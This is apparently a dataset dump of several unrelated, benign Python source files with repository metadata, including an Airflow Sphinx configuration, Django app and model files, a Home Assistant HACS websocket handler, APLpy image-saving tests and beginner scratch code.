htmlhelp_basename = 'Airflowdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'Airflow.tex', u'Airflow Documentation',
u'Apache Airflow', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'airflow', u'Airflow Documentation',
[u'Apache Airflow'], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [(
'index', 'Airflow', u'Airflow Documentation',
u'Apache Airflow', 'Airflow',
'Airflow is a system to programmaticaly author, schedule and monitor data pipelines.',
'Miscellaneous'
), ]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
# sphinx-autoapi configuration
# See:
# https://sphinx-autoapi.readthedocs.io/en/latest/config.html
# Paths (relative or absolute) to the source code that you wish to generate
# your API documentation from.
autoapi_dirs = [
os.path.abspath('../airflow'),
]
# A directory that has user-defined templates to override our default templates.
autoapi_template_dir = 'autoapi_templates'
# A list of patterns to ignore when finding files
autoapi_ignore = [
# These modules are backcompat shims, don't build docs for them
'*/airflow/contrib/operators/s3_to_gcs_transfer_operator.py',
'*/airflow/contrib/operators/gcs_to_gcs_transfer_operator.py',
'*/airflow/contrib/operators/gcs_to_gcs_transfer_operator.py',
'*/node_modules/*',
'*/migrations/*',
]
# Keep the AutoAPI generated files on the filesystem after the run.
# Useful for debugging.
autoapi_keep_files = False
# Relative path to output the AutoAPI files into. This can also be used to place the generated documentation
# anywhere in your documentation hierarchy.
autoapi_root = '_api'
# -- Options for example include ------------------------------------------
exampleinclude_sourceroot = os.path.abspath('..')
| 30.599548
| 108
| 0.699963
|
c10a87b161c6a0af9997d7c6ff9382a2b9b90439
| 176
|
py
|
Python
|
Python/file.py
|
streamer-AP/HRT19D-detection
|
8d7f2447d1ce9e8dc4f2b66162e2972f42c0298f
|
[
"Apache-2.0"
] | 24
|
2018-12-09T07:38:59.000Z
|
2021-03-08T10:47:12.000Z
|
Python/file.py
|
streamer-AP/HRT19D-detection
|
8d7f2447d1ce9e8dc4f2b66162e2972f42c0298f
|
[
"Apache-2.0"
] | null | null | null |
Python/file.py
|
streamer-AP/HRT19D-detection
|
8d7f2447d1ce9e8dc4f2b66162e2972f42c0298f
|
[
"Apache-2.0"
] | 4
|
2019-01-07T06:03:10.000Z
|
2019-01-17T02:53:02.000Z
|
with open("testfile.txt","w") as file_object:
file_object.writelines(["hello\r","HRTER"])
with open("testfile.txt","r") as file_object:
print(file_object.readlines())
| 29.333333
| 47
| 0.698864
|
291f8a78955e9e4563e91844eadcad4524ad3ea6
| 87
|
py
|
Python
|
ozone-framework-python-server/legacy/apps.py
|
aamduka/ozone
|
3fdbf232f5ea70661204a632e45310ca9d374973
|
[
"Apache-2.0"
] | 6
|
2020-02-21T22:06:31.000Z
|
2020-12-08T10:48:07.000Z
|
ozone-framework-python-server/legacy/apps.py
|
aamduka/ozone
|
3fdbf232f5ea70661204a632e45310ca9d374973
|
[
"Apache-2.0"
] | 12
|
2019-12-26T17:38:40.000Z
|
2022-02-10T14:15:55.000Z
|
legacy/apps.py
|
tiagocordeiro/estudio-sie
|
96ba0024145d1f9e0ec7a3cbdd11e555674b23a3
|
[
"MIT"
] | 4
|
2019-09-20T01:20:33.000Z
|
2020-09-05T01:15:51.000Z
|
from django.apps import AppConfig
class LegacyConfig(AppConfig):
name = 'legacy'
| 14.5
| 33
| 0.747126
|
d4d79f5d9bb219df38fd95f6884eed2f4452b873
| 2,880
|
py
|
Python
|
casa.CONFIG/frenck-config/custom_components/hacs/api/hacs_repositories.py
|
janiversen/ha_config
|
98d7d4eed3a136220133724a044b9358896efbb7
|
[
"Apache-2.0"
] | 1,383
|
2018-06-23T20:16:57.000Z
|
2022-03-30T09:10:06.000Z
|
config/custom_components/hacs/api/hacs_repositories.py
|
jclark2019/home-assistant-config
|
a1354a8889e12b961fd16f4800c452b4fd0124f0
|
[
"MIT"
] | 60
|
2018-12-14T10:11:34.000Z
|
2021-11-06T18:43:19.000Z
|
config/custom_components/hacs/api/hacs_repositories.py
|
jclark2019/home-assistant-config
|
a1354a8889e12b961fd16f4800c452b4fd0124f0
|
[
"MIT"
] | 270
|
2018-12-17T05:54:10.000Z
|
2022-03-23T20:28:54.000Z
|
"""API Handler for hacs_repositories"""
from homeassistant.components import websocket_api
import voluptuous as vol
from custom_components.hacs.share import get_hacs
@websocket_api.async_response
@websocket_api.websocket_command({vol.Required("type"): "hacs/repositories"})
async def hacs_repositories(_hass, connection, msg):
"""Handle get media player cover command."""
hacs = get_hacs()
repositories = hacs.repositories
content = []
for repo in repositories:
if (
repo.data.category in hacs.common.categories
and not repo.ignored_by_country_configuration
):
data = {
"additional_info": repo.information.additional_info,
"authors": repo.data.authors,
"available_version": repo.display_available_version,
"beta": repo.data.show_beta,
"can_install": repo.can_install,
"category": repo.data.category,
"country": repo.data.country,
"config_flow": repo.data.config_flow,
"custom": repo.custom,
"default_branch": repo.data.default_branch,
"description": repo.data.description,
"domain": repo.data.domain,
"downloads": repo.data.downloads,
"file_name": repo.data.file_name,
"first_install": repo.status.first_install,
"full_name": repo.data.full_name,
"hide": repo.data.hide,
"hide_default_branch": repo.data.hide_default_branch,
"homeassistant": repo.data.homeassistant,
"id": repo.data.id,
"info": repo.information.info,
"installed_version": repo.display_installed_version,
"installed": repo.data.installed,
"issues": repo.data.open_issues,
"javascript_type": repo.information.javascript_type,
"last_updated": repo.data.last_updated,
"local_path": repo.content.path.local,
"main_action": repo.main_action,
"name": repo.display_name,
"new": repo.data.new,
"pending_upgrade": repo.pending_upgrade,
"releases": repo.data.published_tags,
"selected_tag": repo.data.selected_tag,
"stars": repo.data.stargazers_count,
"state": repo.state,
"status_description": repo.display_status_description,
"status": repo.display_status,
"topics": repo.data.topics,
"updated_info": repo.status.updated_info,
"version_or_commit": repo.display_version_or_commit,
}
content.append(data)
connection.send_message(websocket_api.result_message(msg["id"], content))
| 43.636364
| 77
| 0.588194
|
18f5c8b77e97b05821787e44f30da7ac7fe6a142
| 3,013
|
py
|
Python
|
test.py
|
G00364756/PythonExamples
|
3db5ba6fd333552cc924bfc779381354b6239ae3
|
[
"Apache-2.0"
] | null | null | null |
test.py
|
G00364756/PythonExamples
|
3db5ba6fd333552cc924bfc779381354b6239ae3
|
[
"Apache-2.0"
] | null | null | null |
test.py
|
G00364756/PythonExamples
|
3db5ba6fd333552cc924bfc779381354b6239ae3
|
[
"Apache-2.0"
] | null | null | null |
#def ask_ok(prompt, retries=4, reminder='Please try again!'):
#while True:
#ok = input(prompt)
#if ok in ('y', 'ye', 'yes'):
#return True
#if ok in ('n', 'no', 'nop', 'nope'):
#return False
#retries = retries - 1
#if retries < 0:
#raise ValueError('invalid user response')
#print(reminder)
#ask_ok("overwrite file?")
#-------------------------------------------------------------------------------
#s = 9
#x = str(s)
#z = x[::-1]
#print(z)
#--------------------------------------------------------------------------------
#Alps = range(1,5,1)
#Rockies = range(1,5,1)
#for a,b in zip(Alps,Rockies):
#p = a*b
#newRange = [p]
#print(newRange)
#----------------------------------------------------------------------------------
#def isPalin(n):
# """Function tests whether a number is a palindrome or not"""
# z = str(n) # creates a string from number,integer,etc.
# s = z[::-1] # this reverses the order of the string
# if z == s:
# return "True"
# else:
# return "False"
#-----------------------------------------------------------------------------
#def isPalarray(x):
# """Function returns a list of palindromes"""
# palindromes = []
# while x < 100: # this loop adds palindromes to the list if it is one
# if isPalin(x) == "True": # see isPalin definition
# palindromes.append(x)
# x = x + 1
# elif isPalin(x) == "False":
# x = x + 1
# return(palindromes)
#def iterate(t):
# """Function iterate i and then j"""
# myRange = []
# q = 1000 # limits the range for a
# r = 1000 # limit the range for b
# for b in range (899,q,1):
# for a in range(899,r,1):
# p = a*b
# myRange.append(p) # adds p to the range "myRange"
# myRange.sort() # sorts the range
# v = []
# for l in myRange:
# if l not in v: # creates a new list that takes away all the duplicates from the original list
# v.append(l)
# return (v)
#y = 1
#ans = iterate(y)
#print(ans)
#x = 1
#u = isPalarray(x)
#print(u)
#------------------------------------------------------------------------------------------
#Range1 = []
#i = 3
#while i < 100:
# i = i + 2
# Range1.append(i)
#Range2 = []
#x = 2
#y = 1
#j = 2*(x*y)
#while j < 100:
# Range2.append(j)
# x = x + 1
# y = y + 1
# j = 2*(x*y)
#---------------------------------------------------------------------------------
#n = 20
#Alps = []
#while n != 0:
# for b in range (1,21,1):
# if n % b == 0:
# print(n)
# break
# else:
# n = n + 20
cubes = [0,1,2,3,4]
letters = cubes
print(letters)
hi=[]
pp=[]
def splits(name):
if name == hi:
return("hi")
elif name == pp:
return("heya!")
else:
pass
print(splits(pp))
| 25.533898
| 103
| 0.404248
|
b32fac236c21e688ffe22a489ee1b1ec7a5f0555
| 327
|
py
|
Python
|
jobs/models.py
|
pauljeffrey/portfolio
|
ff91ab2a6e30886f0a686aae56fe2df45e497fbd
|
[
"MIT"
] | 3
|
2019-06-23T11:35:15.000Z
|
2022-03-28T15:39:23.000Z
|
jobs/models.py
|
pauljeffrey/portfolio
|
ff91ab2a6e30886f0a686aae56fe2df45e497fbd
|
[
"MIT"
] | 2
|
2019-01-30T21:00:41.000Z
|
2020-03-06T00:15:20.000Z
|
jobs/models.py
|
pauljeffrey/portfolio
|
ff91ab2a6e30886f0a686aae56fe2df45e497fbd
|
[
"MIT"
] | 3
|
2019-03-19T06:18:43.000Z
|
2021-06-23T16:30:51.000Z
|
from django.db import models
from django.urls import reverse
# Create your models here.
class Jobs(models.Model):
image = models.ImageField(upload_to="images/")
upload_date = models.DateTimeField(auto_now_add=True)
def get_absolute_url(self):
return reverse('home', args=[str(self.id)])
| 19.235294
| 57
| 0.691131
|
ed1f71449a9d2cac3c00fc2cde725e0afa739990
| 2,816
|
py
|
Python
|
aplpy/tests/test_save.py
|
GiantMolecularCloud/aplpy
|
352fdd7fc776ebcb9058451e0b3aced777083257
|
[
"MIT"
] | null | null | null |
aplpy/tests/test_save.py
|
GiantMolecularCloud/aplpy
|
352fdd7fc776ebcb9058451e0b3aced777083257
|
[
"MIT"
] | null | null | null |
aplpy/tests/test_save.py
|
GiantMolecularCloud/aplpy
|
352fdd7fc776ebcb9058451e0b3aced777083257
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import, print_function, division
import os
import sys
from io import BytesIO as StringIO
import pytest
import numpy as np
from .. import FITSFigure
FORMATS = [None, 'png', 'pdf', 'eps', 'ps', 'svg']
ARRAY = np.arange(256).reshape((16, 16))
def is_format(filename, format):
if isinstance(filename, str):
f = open(filename, 'rb')
else:
f = filename
if format == 'png':
return f.read(8) == b'\x89\x50\x4e\x47\x0d\x0a\x1a\x0a'
elif format == 'pdf':
return f.read(4) == b'\x25\x50\x44\x46'
elif format == 'eps':
return f.read(23) == b'%!PS-Adobe-3.0 EPSF-3.0'
elif format == 'ps':
return f.read(14) == b'%!PS-Adobe-3.0'
elif format == 'svg':
from xml.dom import minidom
return minidom.parse(f).childNodes[2].attributes['xmlns'].value == 'http://www.w3.org/2000/svg'
else:
raise Exception("Unknown format: %s" % format)
@pytest.mark.parametrize(('format'), FORMATS)
def test_write_png(tmpdir, format):
filename = os.path.join(str(tmpdir), 'test_output.png')
f = FITSFigure(ARRAY)
f.show_grayscale()
try:
f.save(filename, format=format)
except TypeError:
pytest.xfail()
finally:
f.close()
if format is None:
assert is_format(filename, 'png')
else:
assert is_format(filename, format)
@pytest.mark.parametrize(('format'), FORMATS)
def test_write_pdf(tmpdir, format):
filename = os.path.join(str(tmpdir), 'test_output.pdf')
f = FITSFigure(ARRAY)
f.show_grayscale()
try:
f.save(filename, format=format)
except TypeError:
pytest.xfail()
finally:
f.close()
if format is None:
assert is_format(filename, 'pdf')
else:
assert is_format(filename, format)
@pytest.mark.parametrize(('format'), FORMATS)
def test_write_eps(tmpdir, format):
filename = os.path.join(str(tmpdir), 'test_output.eps')
f = FITSFigure(ARRAY)
f.show_grayscale()
try:
f.save(filename, format=format)
except TypeError:
pytest.xfail()
finally:
f.close()
if format is None:
assert is_format(filename, 'eps')
else:
assert is_format(filename, format)
@pytest.mark.parametrize(('format'), FORMATS)
def test_write_stringio(tmpdir, format):
s = StringIO()
f = FITSFigure(ARRAY)
f.show_grayscale()
try:
f.save(s, format=format)
except TypeError:
pytest.xfail()
finally:
f.close()
try:
s.seek(0)
except ValueError:
if format == 'svg' and sys.version_info[:2] >= (3, 3):
pytest.xfail()
else:
raise
if format is None:
assert is_format(s, 'png')
else:
assert is_format(s, format)
| 25.6
| 103
| 0.608665
|
ccfac7062c4a14e4920d04d1f4209ce439e4871b
| 210
|
py
|
Python
|
h/api/__init__.py
|
gnott/h
|
77a0452b8196f7efb97d4a400ce7583062d620e6
|
[
"MIT"
] | null | null | null |
h/api/__init__.py
|
gnott/h
|
77a0452b8196f7efb97d4a400ce7583062d620e6
|
[
"MIT"
] | null | null | null |
h/api/__init__.py
|
gnott/h
|
77a0452b8196f7efb97d4a400ce7583062d620e6
|
[
"MIT"
] | null | null | null |
def includeme(config):
"""Include the annotator-store API."""
# Order matters here, in case the token and store routes share a prefix
config.include('h.api.token')
config.include('h.api.store')
| 35
| 75
| 0.690476
|
9e55c5f210eef6f11748c19e6aa470195a797ea7
| 624
|
py
|
Python
|
manage.py
|
idesu/yet-another-blog-engine
|
99cd2d775577126b08174d9ee3e2e38a22b8d7af
|
[
"BSD-3-Clause"
] | null | null | null |
manage.py
|
idesu/yet-another-blog-engine
|
99cd2d775577126b08174d9ee3e2e38a22b8d7af
|
[
"BSD-3-Clause"
] | 8
|
2021-04-08T21:26:26.000Z
|
2022-03-12T00:18:06.000Z
|
manage.py
|
idesu/yet-another-blog-engine
|
99cd2d775577126b08174d9ee3e2e38a22b8d7af
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'yabe.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| 28.363636
| 73
| 0.68109
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.